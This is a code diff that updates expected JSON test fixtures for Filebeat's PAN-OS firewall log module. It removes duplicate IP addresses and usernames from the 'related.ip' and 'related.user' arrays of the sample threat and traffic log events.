@@ -3713,11 +3641,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3812,11 +3738,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3911,11 +3835,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4008,7 +3930,6 @@ "related.ip": [ "192.168.0.100", "8.8.8.8", - "0.0.0.0", "0.0.0.0" ], "rule.name": "rule1", @@ -4102,11 +4023,9 @@ "related.ip": [ "192.168.0.2", "62.211.68.12", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4202,7 +4121,6 @@ "related.ip": [ "192.168.0.100", "50.19.102.116", - "0.0.0.0", "0.0.0.0" ], "rule.name": "rule1", @@ -4299,11 +4217,9 @@ "related.ip": [ "192.168.0.2", "65.55.223.19", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4401,11 +4317,9 @@ "related.ip": [ "192.168.0.2", "65.55.223.24", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4498,7 +4412,6 @@ "related.ip": [ "192.168.0.100", "8.8.8.8", - "0.0.0.0", "0.0.0.0" ], "rule.name": "rule1", @@ -4595,11 +4508,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4694,11 +4605,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4796,11 +4705,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4895,11 +4802,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4994,11 +4899,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5093,11 +4996,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5192,11 +5093,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5291,11 +5190,9 @@ "related.ip": [ "192.168.0.2", "62.211.68.12", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5393,11 +5290,9 @@ "related.ip": [ "192.168.0.2", "212.48.10.58", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5495,11 +5390,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5594,11 +5487,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5696,11 +5587,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5795,11 +5684,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5894,11 +5781,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5996,11 +5881,9 @@ "related.ip": [ "192.168.0.2", "65.55.223.31", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6098,11 +5981,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6197,11 +6078,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6296,11 +6175,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6395,11 +6272,9 @@ "related.ip": [ "192.168.0.2", "62.211.68.12", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6494,11 +6369,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6593,11 +6466,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6692,11 +6563,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6794,11 +6663,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6893,11 +6760,9 @@ "related.ip": [ "192.168.0.2", "62.211.68.12", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6995,11 +6860,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -7094,11 +6957,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -7193,11 +7054,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -7295,11 +7154,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -7394,11 +7251,9 @@ "related.ip": [ "192.168.0.2", "8.5.1.1", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -7493,11 +7348,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -7592,11 +7445,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -7694,11 +7545,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -7786,11 +7635,9 @@ "related.ip": [ "192.168.0.2", "192.168.0.1", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -7888,11 +7735,9 @@ "related.ip": [ "192.168.0.2", "212.48.10.58", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -7990,11 +7835,9 @@ "related.ip": [ "192.168.0.2", "212.48.10.58", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -8082,11 +7925,9 @@ "related.ip": [ "192.168.0.2", "192.168.0.1", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -8174,11 +8015,9 @@ "related.ip": [ "192.168.0.2", "192.168.0.1", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -8276,11 +8115,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -8375,11 +8212,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -8474,11 +8309,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -8576,11 +8409,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -8675,11 +8506,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -8767,11 +8596,9 @@ "related.ip": [ "192.168.0.2", "192.168.0.1", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -8866,11 +8693,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -8968,11 +8793,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -9067,11 +8890,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -9166,11 +8987,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -9265,11 +9084,9 @@ "related.ip": [ "192.168.0.2", "62.211.68.12", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -9367,11 +9184,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -9469,11 +9284,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -9571,11 +9384,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -9663,11 +9474,9 @@ "related.ip": [ "192.168.0.2", "192.168.0.1", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -9765,11 +9574,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -9867,11 +9674,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -9969,11 +9774,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", diff --git a/x-pack/filebeat/module/panw/panos/test/threat.log-expected.json b/x-pack/filebeat/module/panw/panos/test/threat.log-expected.json index d03e24e00c7b..0d9b9000a970 100644 --- a/x-pack/filebeat/module/panw/panos/test/threat.log-expected.json +++ b/x-pack/filebeat/module/panw/panos/test/threat.log-expected.json @@ -81,8 +81,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -186,8 +185,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -291,8 +289,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -396,8 +393,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -501,8 +497,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -606,8 +601,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -711,8 +705,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -816,8 +809,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -921,8 +913,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -1026,8 +1017,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -1131,8 +1121,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -1236,8 +1225,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -1341,8 +1329,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -1446,8 +1433,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -1551,8 +1537,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -1656,8 +1641,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -1761,8 +1745,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -1866,8 +1849,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -1971,8 +1953,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -2076,8 +2057,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -2181,8 +2161,7 @@ "related.ip": [ "192.168.15.224", "23.72.137.131", - "192.168.1.63", - "23.72.137.131" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "23.72.137.131", @@ -2286,8 +2265,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -2391,8 +2369,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -2496,8 +2473,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -2601,8 +2577,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -2706,8 +2681,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -2811,8 +2785,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -2916,8 +2889,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -3021,8 +2993,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -3126,8 +3097,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -3231,8 +3201,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -3336,8 +3305,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -3441,8 +3409,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -3546,8 +3513,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -3651,8 +3617,7 @@ "related.ip": [ "192.168.15.224", "152.195.55.192", - "192.168.1.63", - "152.195.55.192" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "152.195.55.192", @@ -3756,8 +3721,7 @@ "related.ip": [ "192.168.15.224", "151.101.2.2", - "192.168.1.63", - "151.101.2.2" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "151.101.2.2", @@ -3864,8 +3828,7 @@ "related.ip": [ "192.168.15.224", "54.192.7.152", - "192.168.1.63", - "54.192.7.152" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.192.7.152", @@ -3972,8 +3935,7 @@ "related.ip": [ "192.168.15.224", "52.4.120.175", - "192.168.1.63", - "52.4.120.175" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "52.4.120.175", @@ -4080,8 +4042,7 @@ "related.ip": [ "192.168.15.224", "52.4.120.175", - "192.168.1.63", - "52.4.120.175" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "52.4.120.175", @@ -4188,8 +4149,7 @@ "related.ip": [ "192.168.15.224", "52.4.120.175", - "192.168.1.63", - "52.4.120.175" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "52.4.120.175", @@ -4296,8 +4256,7 @@ "related.ip": [ "192.168.15.224", "52.4.120.175", - "192.168.1.63", - "52.4.120.175" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "52.4.120.175", @@ -4404,8 +4363,7 @@ "related.ip": [ "192.168.15.224", "52.4.120.175", - "192.168.1.63", - "52.4.120.175" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "52.4.120.175", @@ -4512,8 +4470,7 @@ "related.ip": [ "192.168.15.224", "52.4.120.175", - "192.168.1.63", - "52.4.120.175" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "52.4.120.175", @@ -4620,8 +4577,7 @@ "related.ip": [ "192.168.15.224", "52.4.120.175", - "192.168.1.63", - "52.4.120.175" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "52.4.120.175", @@ -4728,8 +4684,7 @@ "related.ip": [ "192.168.15.224", "52.4.120.175", - "192.168.1.63", - "52.4.120.175" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "52.4.120.175", @@ -4836,8 +4791,7 @@ "related.ip": [ "192.168.15.224", "52.4.120.175", - "192.168.1.63", - "52.4.120.175" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "52.4.120.175", @@ -4944,8 +4898,7 @@ "related.ip": [ "192.168.15.224", "52.4.120.175", - "192.168.1.63", - "52.4.120.175" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "52.4.120.175", @@ -5052,8 +5005,7 @@ "related.ip": [ "192.168.15.224", "52.4.120.175", - "192.168.1.63", - "52.4.120.175" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "52.4.120.175", @@ -5160,8 +5112,7 @@ "related.ip": [ "192.168.15.224", "52.4.120.175", - "192.168.1.63", - "52.4.120.175" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "52.4.120.175", @@ -5268,8 +5219,7 @@ "related.ip": [ "192.168.15.224", "216.58.194.98", - "192.168.1.63", - "216.58.194.98" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "216.58.194.98", @@ -5373,8 +5323,7 @@ "related.ip": [ "192.168.15.224", "23.72.145.245", - "192.168.1.63", - "23.72.145.245" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "23.72.145.245", @@ -5478,8 +5427,7 @@ "related.ip": [ "192.168.15.224", "23.72.145.245", - "192.168.1.63", - "23.72.145.245" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "23.72.145.245", @@ -5583,8 +5531,7 @@ "related.ip": [ "192.168.15.224", "23.72.145.245", - "192.168.1.63", - "23.72.145.245" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "23.72.145.245", @@ -5688,8 +5635,7 @@ "related.ip": [ "192.168.15.224", "23.72.145.245", - "192.168.1.63", - "23.72.145.245" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "23.72.145.245", @@ -5793,8 +5739,7 @@ "related.ip": [ "192.168.15.224", "23.72.145.245", - "192.168.1.63", - "23.72.145.245" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "23.72.145.245", @@ -5898,8 +5843,7 @@ "related.ip": [ "192.168.15.224", "23.72.145.245", - "192.168.1.63", - "23.72.145.245" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "23.72.145.245", @@ -6003,8 +5947,7 @@ "related.ip": [ "192.168.15.224", "23.72.145.245", - "192.168.1.63", - "23.72.145.245" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "23.72.145.245", @@ -6108,8 +6051,7 @@ "related.ip": [ "192.168.15.224", "23.72.145.245", - "192.168.1.63", - "23.72.145.245" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "23.72.145.245", @@ -6213,8 +6155,7 @@ "related.ip": [ "192.168.15.224", "23.72.145.245", - "192.168.1.63", - "23.72.145.245" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "23.72.145.245", @@ -6318,8 +6259,7 @@ "related.ip": [ "192.168.15.224", "23.72.145.245", - "192.168.1.63", - "23.72.145.245" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "23.72.145.245", @@ -6426,8 +6366,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -6534,8 +6473,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -6642,8 +6580,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -6750,8 +6687,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -6858,8 +6794,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -6966,8 +6901,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -7074,8 +7008,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -7182,8 +7115,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -7290,8 +7222,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -7398,8 +7329,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -7506,8 +7436,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -7614,8 +7543,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -7722,8 +7650,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -7830,8 +7757,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -7938,8 +7864,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", @@ -8046,8 +7971,7 @@ "related.ip": [ "192.168.15.224", "54.209.101.70", - "192.168.1.63", - "54.209.101.70" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.ip": "54.209.101.70", diff --git a/x-pack/filebeat/module/panw/panos/test/traffic.log-expected.json b/x-pack/filebeat/module/panw/panos/test/traffic.log-expected.json index 200e02370d3d..a6877841bd39 100644 --- a/x-pack/filebeat/module/panw/panos/test/traffic.log-expected.json +++ b/x-pack/filebeat/module/panw/panos/test/traffic.log-expected.json @@ -86,8 +86,7 @@ "related.ip": [ "192.168.15.207", "184.51.253.152", - "192.168.1.63", - "184.51.253.152" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 5976, @@ -196,8 +195,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 588, @@ -309,8 +307,7 @@ "related.ip": [ "192.168.15.207", "17.253.3.202", - "192.168.1.63", - "17.253.3.202" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 1035, @@ -419,8 +416,7 @@ "related.ip": [ 